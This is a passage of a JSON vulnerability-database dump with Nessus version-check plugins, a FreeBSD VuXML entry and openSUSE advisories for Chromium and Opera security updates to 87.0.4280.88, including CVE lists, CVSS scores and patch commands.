script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 87.0.4280.88\"), vulnerable:make_list(\"lt 87.0.4280.88\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 87.0.4280.88\"), vulnerable:make_list(\"lt 87.0.4280.88\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:29:28", "description": "Multiple security issues were discovered in the Chromium web browser, which could result in the execution of arbitrary code, denial of service or information disclosure.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-01-04T00:00:00", "type": "nessus", "title": "Debian DSA-4824-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15959", "CVE-2020-15960", "CVE-2020-15961", "CVE-2020-15962", "CVE-2020-15963", "CVE-2020-15964", "CVE-2020-15965", "CVE-2020-15966", "CVE-2020-15967", "CVE-2020-15968", "CVE-2020-15969", "CVE-2020-15970", "CVE-2020-15971", "CVE-2020-15972", "CVE-2020-15973", "CVE-2020-15974", "CVE-2020-15975", "CVE-2020-15976", "CVE-2020-15977", "CVE-2020-15978", "CVE-2020-15979", "CVE-2020-15980", "CVE-2020-15981", "CVE-2020-15982", "CVE-2020-15983", "CVE-2020-15984", "CVE-2020-15985", "CVE-2020-15986", "CVE-2020-15987", "CVE-2020-15988", "CVE-2020-15989", "CVE-2020-15990", "CVE-2020-15991", "CVE-2020-15992", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011", "CVE-2020-16012", "CVE-2020-16013", "CVE-2020-16014", "CVE-2020-16015", "CVE-2020-16016", "CVE-2020-16017", "CVE-2020-16018", "CVE-2020-16019", "CVE-2020-16020", "CVE-2020-16021", "CVE-2020-16022", "CVE-2020-16023", "CVE-2020-16024", "CVE-2020-16025", "CVE-2020-16026", "CVE-2020-16027", "CVE-2020-16028", "CVE-2020-16029", "CVE-2020-16030", "CVE-2020-16031", "CVE-2020-16032", "CVE-2020-16033", "CVE-2020-16034", "CVE-2020-16035", "CVE-2020-16036", "CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042", "CVE-2020-6510", "CVE-2020-6511", "CVE-2020-6512", "CVE-2020-6513", "CVE-2020-6514", "CVE-2020-6515", "CVE-2020-6516", "CVE-2020-6517", "CVE-2020-6518", "CVE-2020-6519", "CVE-2020-6520", "CVE-2020-6521", "CVE-2020-6522", "CVE-2020-6523", "CVE-2020-6524", "CVE-2020-6525", "CVE-2020-6526", "CVE-2020-6527", "CVE-2020-6528", "CVE-2020-6529", "CVE-2020-6530", "CVE-2020-6531", "CVE-2020-6532", "CVE-2020-6533", "CVE-2020-6534", "CVE-2020-6535", "CVE-2020-6536", "CVE-2020-6537", "CVE-2020-6538", "CVE-2020-6539", "CVE-2020-6540", "CVE-2020-6541", "CVE-2020-6542", "CVE-2020-6543", "CVE-2020-6544", "CVE-2020-6545", "CVE-2020-6546", "CVE-2020-6547", "CVE-2020-6548", "CVE-2020-6549", "CVE-2020-6550", "CVE-2020-6551", "CVE-2020-6552", "CVE-2020-6553", "CVE-2020-6554", "CVE-2020-6555", "CVE-2020-6556", "CVE-2020-6557", "CVE-2020-6558", "CVE-2020-6559", "CVE-2020-6560", "CVE-2020-6561", "CVE-2020-6562", "CVE-2020-6563", "CVE-2020-6564", "CVE-2020-6565", "CVE-2020-6566", "CVE-2020-6567", "CVE-2020-6568", "CVE-2020-6569", "CVE-2020-6570", "CVE-2020-6571", "CVE-2020-6573", "CVE-2020-6574", "CVE-2020-6575", "CVE-2020-6576"], "modified": "2022-12-08T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4824.NASL", "href": "https://www.tenable.com/plugins/nessus/144672", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4824. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144672);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/08\");\n\n script_cve_id(\"CVE-2020-15959\", \"CVE-2020-15960\", \"CVE-2020-15961\", \"CVE-2020-15962\", \"CVE-2020-15963\", \"CVE-2020-15964\", \"CVE-2020-15965\", \"CVE-2020-15966\", \"CVE-2020-15967\", \"CVE-2020-15968\", \"CVE-2020-15969\", \"CVE-2020-15970\", \"CVE-2020-15971\", \"CVE-2020-15972\", \"CVE-2020-15973\", \"CVE-2020-15974\", \"CVE-2020-15975\", \"CVE-2020-15976\", \"CVE-2020-15977\", \"CVE-2020-15978\", \"CVE-2020-15979\", \"CVE-2020-15980\", \"CVE-2020-15981\", \"CVE-2020-15982\", \"CVE-2020-15983\", \"CVE-2020-15984\", \"CVE-2020-15985\", \"CVE-2020-15986\", \"CVE-2020-15987\", \"CVE-2020-15988\", \"CVE-2020-15989\", \"CVE-2020-15990\", \"CVE-2020-15991\", \"CVE-2020-15992\", \"CVE-2020-15999\", \"CVE-2020-16000\", \"CVE-2020-16001\", \"CVE-2020-16002\", \"CVE-2020-16003\", \"CVE-2020-16004\", \"CVE-2020-16005\", \"CVE-2020-16006\", \"CVE-2020-16007\", \"CVE-2020-16008\", \"CVE-2020-16009\", \"CVE-2020-16011\", \"CVE-2020-16012\", \"CVE-2020-16013\", \"CVE-2020-16014\", \"CVE-2020-16015\", \"CVE-2020-16016\", \"CVE-2020-16017\", \"CVE-2020-16018\", \"CVE-2020-16019\", \"CVE-2020-16020\", \"CVE-2020-16021\", \"CVE-2020-16022\", \"CVE-2020-16023\", \"CVE-2020-16024\", \"CVE-2020-16025\", \"CVE-2020-16026\", \"CVE-2020-16027\", \"CVE-2020-16028\", \"CVE-2020-16029\", \"CVE-2020-16030\", \"CVE-2020-16031\", \"CVE-2020-16032\", \"CVE-2020-16033\", \"CVE-2020-16034\", \"CVE-2020-16035\", \"CVE-2020-16036\", \"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\", \"CVE-2020-6510\", \"CVE-2020-6511\", \"CVE-2020-6512\", \"CVE-2020-6513\", \"CVE-2020-6514\", \"CVE-2020-6515\", \"CVE-2020-6516\", \"CVE-2020-6517\", \"CVE-2020-6518\", \"CVE-2020-6519\", \"CVE-2020-6520\", \"CVE-2020-6521\", \"CVE-2020-6522\", \"CVE-2020-6523\", \"CVE-2020-6524\", \"CVE-2020-6525\", \"CVE-2020-6526\", \"CVE-2020-6527\", \"CVE-2020-6528\", \"CVE-2020-6529\", \"CVE-2020-6530\", \"CVE-2020-6531\", \"CVE-2020-6532\", \"CVE-2020-6533\", \"CVE-2020-6534\", \"CVE-2020-6535\", \"CVE-2020-6536\", \"CVE-2020-6537\", \"CVE-2020-6538\", \"CVE-2020-6539\", \"CVE-2020-6540\", \"CVE-2020-6541\", \"CVE-2020-6542\", \"CVE-2020-6543\", \"CVE-2020-6544\", \"CVE-2020-6545\", \"CVE-2020-6546\", \"CVE-2020-6547\", \"CVE-2020-6548\", \"CVE-2020-6549\", \"CVE-2020-6550\", \"CVE-2020-6551\", \"CVE-2020-6552\", \"CVE-2020-6553\", \"CVE-2020-6554\", \"CVE-2020-6555\", \"CVE-2020-6556\", \"CVE-2020-6557\", \"CVE-2020-6558\", \"CVE-2020-6559\", \"CVE-2020-6560\", \"CVE-2020-6561\", \"CVE-2020-6562\", \"CVE-2020-6563\", \"CVE-2020-6564\", \"CVE-2020-6565\", \"CVE-2020-6566\", \"CVE-2020-6567\", \"CVE-2020-6568\", \"CVE-2020-6569\", \"CVE-2020-6570\", \"CVE-2020-6571\", \"CVE-2020-6573\", \"CVE-2020-6574\", \"CVE-2020-6575\", \"CVE-2020-6576\");\n script_xref(name:\"DSA\", value:\"4824\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Debian DSA-4824-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple security issues were discovered in the Chromium web browser,\nwhich could result in the execution of arbitrary code, denial of\nservice or information disclosure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4824\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 87.0.4280.88-0.4~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6559\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"87.0.4280.88-0.4~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"87.0.4280.88-0.4~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"87.0.4280.88-0.4~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"87.0.4280.88-0.4~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"87.0.4280.88-0.4~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"87.0.4280.88-0.4~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nChrome Releases reports:\n\nThis release contains 8 security fixes, including:\n\n[1142331] High CVE-2020-16037: Use after free in clipboard.\n\t Reported by Ryoya Tsukasaki on 2020-10-26\n[1138683] High CVE-2020-16038: Use after free in media.\n\t Reported by Khalil Zhani on 2020-10-14\n[1149177] High CVE-2020-16039: Use after free in extensions.\n\t Reported by Anonymous on 2020-11-15\n[1150649] High CVE-2020-16040: Insufficient data validation in\n\t V8. Reported by Lucas Pinheiro, Microsoft Browser Vulnerability\n\t Research on 2020-11-19\n[1151865] Medium CVE-2020-16041: Out of bounds read in\n\t networking. Reported by Sergei Glazunov and Mark Brand of Google\n\t Project Zero on 2020-11-23\n[1151890] Medium CVE-2020-16042: Uninitialized Use in V8.\n\t Reported by Andr\u00e9 Bargull on 2020-11-2\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-02T00:00:00", "id": "01FFD06A-36ED-11EB-B655-3065EC8FD3EC", "href": "https://vuxml.freebsd.org/freebsd/01ffd06a-36ed-11eb-b655-3065ec8fd3ec.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-11-06T19:35:00", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for opera fixes the following issues:\n\n - Update to version 73.0.3856.284\n - CHR-8225 Update chromium on desktop-stable-87-3856 to 87.0.4280.88\n - DNA-88454 Background of snap area above visible scrolled viewport is\n not captured\n - DNA-89749 Implement client_capabilities support for Flow / Sync\n - DNA-89810 Opera no longer autoselects full url/address bar when clicked\n - DNA-89923 [Snap] Emojis look grayed out\n - DNA-90060 Make gesture events work with search-in-tabs feature\n - DNA-90168 Display SD suggestions titles\n - DNA-90176 Player doesn\ufffd\ufffd\ufffdt show music service to choose on Welcome page\n - DNA-90343 [Mac] Cmd+C doesn\ufffd\ufffd\ufffdt copy snapshot\n - DNA-90538 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type, extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n - The update to chromium 87.0.4280.88 fixes following issues:\n CVE-2020-16037, CVE-2020-16038, CVE-2020-16039, CVE-2020-16040,\n CVE-2020-16041, CVE-2020-16042\n\n - Update to version 73.0.3856.257\n - DNA-89918 #enable-force-dark flag doesn\ufffd\ufffd\ufffdt work anymore\n - DNA-90061 Clicking on video\ufffd\ufffd\ufffds progress bar breaks autopausing\n - DNA-90079 [BigSur] Blank pages\n - DNA-90154 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type, extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n - Complete Opera 73.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-73/\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:NonFree:\n\n zypper in -t patch openSUSE-2020-2359=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-29T00:00:00", "type": "suse", "title": "Security update for opera (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-29T00:00:00", "id": "OPENSUSE-SU-2020:2359-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/AKN6XFMHGSU5TFVYGT3C4SOLOD7IXLXK/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-06T19:35:00", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for opera fixes the following issues:\n\n - Update to version 73.0.3856.284\n - CHR-8225 Update chromium on desktop-stable-87-3856 to 87.0.4280.88\n - DNA-88454 Background of snap area above visible scrolled viewport is\n not captured\n - DNA-89749 Implement client_capabilities support for Flow / Sync\n - DNA-89810 Opera no longer autoselects full url/address bar when clicked\n - DNA-89923 [Snap] Emojis look grayed out\n - DNA-90060 Make gesture events work with search-in-tabs feature\n - DNA-90168 Display SD suggestions titles\n - DNA-90176 Player doesn\ufffd\ufffd\ufffdt show music service to choose on Welcome page\n - DNA-90343 [Mac] Cmd+C doesn\ufffd\ufffd\ufffdt copy snapshot\n - DNA-90538 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type, extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n - The update to chromium 87.0.4280.88 fixes following issues:\n CVE-2020-16037, CVE-2020-16038, CVE-2020-16039, CVE-2020-16040,\n CVE-2020-16041, CVE-2020-16042\n\n - Update to version 73.0.3856.257\n - DNA-89918 #enable-force-dark flag doesn\ufffd\ufffd\ufffdt work anymore\n - DNA-90061 Clicking on video\ufffd\ufffd\ufffds progress bar breaks autopausing\n - DNA-90079 [BigSur] Blank pages\n - DNA-90154 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type, extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n - Complete Opera 73.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-73/\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:NonFree:\n\n zypper in -t patch openSUSE-2020-2360=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-29T00:00:00", "type": "suse", "title": "Security update for opera (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-29T00:00:00", "id": "OPENSUSE-SU-2020:2360-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/DD5O6DYQGK2VKG37ZUD4DXDFLTSCZFGY/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:49", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n Update to 87.0.4280.88 boo#1179576\n\n - CVE-2020-16037: Use after free in clipboard\n - CVE-2020-16038: Use after free in media\n - CVE-2020-16039: Use after free in extensions\n - CVE-2020-16040: Insufficient data validation in V8\n - CVE-2020-16041: Out of bounds read in networking\n - CVE-2020-16042: Uninitialized Use in V8\n\n This update was imported from the openSUSE:Leap:15.1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2020-2229=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "suse", "title": "Security update for chromium (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-11T00:00:00", "id": "OPENSUSE-SU-2020:2229-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/LVYWJ3IDOZBKDSDO2ORAHQLOXALQJEGV/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-06T19:35:00", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n Update to 87.0.4280.88 boo#1179576\n\n - CVE-2020-16037: Use after free in clipboard\n - CVE-2020-16038: Use after free in media\n - CVE-2020-16039: Use after free in extensions\n - CVE-2020-16040: Insufficient data validation in V8\n - CVE-2020-16041: Out of bounds read in networking\n - CVE-2020-16042: Uninitialized Use in V8\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-2216=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-09T00:00:00", "type": "suse", "title": "Security update for chromium (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-09T00:00:00", "id": "OPENSUSE-SU-2020:2216-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/XPQHVY33MWDC273XBHHGBLLDEBESEZOU/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:49", "description": "An update that fixes 6 vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n Update to 87.0.4280.88 (boo#1179576)\n\n - CVE-2020-16037: Use after free in clipboard\n - CVE-2020-16038: Use after free in media\n - CVE-2020-16039: Use after free in extensions\n - CVE-2020-16040: Insufficient data validation in V8\n - CVE-2020-16041: Out of bounds read in networking\n - CVE-2020-16042: Uninitialized Use in V8\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-2181=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 